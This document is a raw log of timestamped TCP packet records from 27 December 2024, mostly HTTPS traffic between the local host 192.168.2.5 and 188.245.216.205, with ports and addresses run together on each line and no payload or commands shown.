                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.860091925 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.860229015 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.860295057 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.860368013 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.860380888 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.860631943 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.860678911 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.860707045 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.860757113 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.860801935 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.860850096 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.861001015 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.862481117 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.862538099 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.862684965 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.862740993 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.864063025 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.865537882 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.887093067 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.894709110 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.894747972 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.894891024 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.894994974 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.895062923 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.895117044 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.895193100 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.895215988 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.895271063 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.895849943 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.896033049 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.901338100 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.901598930 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.901614904 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.902013063 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.902060032 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.902100086 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.902144909 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.902203083 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.902385950 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.902426004 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.902587891 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.902702093 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.943344116 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.943918943 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.944082022 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.944124937 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.944199085 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.944253922 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.944274902 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.944327116 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.944364071 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.944704056 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.969938993 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.970217943 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.970246077 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.970267057 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.971082926 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.971662998 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.971674919 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.972357988 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.972573042 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.972618103 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.972740889 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.972793102 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.972898960 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.972914934 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.973006010 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.973016977 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.973042011 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.976574898 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.977413893 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.977432013 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.977658987 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.977790117 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.977833986 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.977956057 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.978005886 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.978148937 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.978171110 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.978549957 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.979351044 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.979368925 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.979552031 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.979571104 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.979646921 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.979708910 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.979775906 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.979875088 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.979897976 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.979917049 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.979928970 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.979938984 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.980734110 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.981345892 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.981363058 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.981421947 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.981482983 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.981542110 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.981554985 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.981584072 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.982908010 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.982932091 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.983012915 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.983491898 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.983506918 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.983685017 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.983839989 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.983853102 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.983869076 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.983989000 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.984010935 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.984086037 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.984117985 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.984172106 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.985140085 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.992460966 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.992482901 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.992521048 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.992535114 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.992593050 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.992980003 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.993045092 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.993052006 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.993091106 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.993098974 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.993118048 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.993161917 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.993211985 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.993382931 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.993431091 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.013040066 CET49862443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.013067007 CET4434986220.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.039361954 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.044430017 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.044466019 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.044477940 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.044807911 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.044857025 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.044904947 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.044962883 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.044977903 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.044997931 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.045281887 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.078866959 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.080761909 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.080780029 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.080801964 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.080869913 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.080921888 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.080951929 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.081006050 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.081183910 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.081223011 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.081268072 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.081432104 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.120779991 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.125256062 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.125289917 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.125514984 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.125534058 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.125561953 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.125575066 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.125677109 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.125693083 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.125736952 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.125751972 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.132119894 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.132153988 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.132447004 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.132461071 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.132605076 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.132621050 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.132647038 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.132659912 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.132807970 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.132817984 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.132842064 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.132860899 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.132982969 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.132997990 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.133023024 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.133043051 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.133097887 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.133449078 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.133500099 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.133507967 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.133543015 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.133563042 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.133620024 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.133661032 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.133704901 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.133747101 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.159435987 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.163784981 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.163820028 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.163845062 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.163899899 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.163983107 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.164000034 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.164192915 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.164320946 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.164463997 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.164522886 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.164830923 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.211328983 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.211891890 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.211946964 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.212055922 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.212131977 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.212229013 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.212277889 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.212316036 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.212363005 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.212400913 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.235589027 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.237577915 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.237601995 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.237776995 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.237791061 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.237909079 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.237925053 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.237948895 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.237962008 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.238045931 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.238059044 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.238111019 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.238128901 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.238143921 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.238158941 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.238173962 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.238199949 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.238543987 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.238559961 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.238607883 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.238621950 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.238805056 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.238818884 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.239003897 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.239020109 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.239042997 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.239057064 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.239105940 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.239119053 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.239161968 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.239173889 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.239357948 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.239376068 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.239386082 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.239408970 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.239419937 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.239475965 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.239502907 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.239514112 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.239526987 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.239629030 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.239641905 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.239665031 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.239672899 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.239691973 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.239710093 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.239777088 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.239789963 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:50.239844084 CET49902443192.168.2.5188.245.216.205
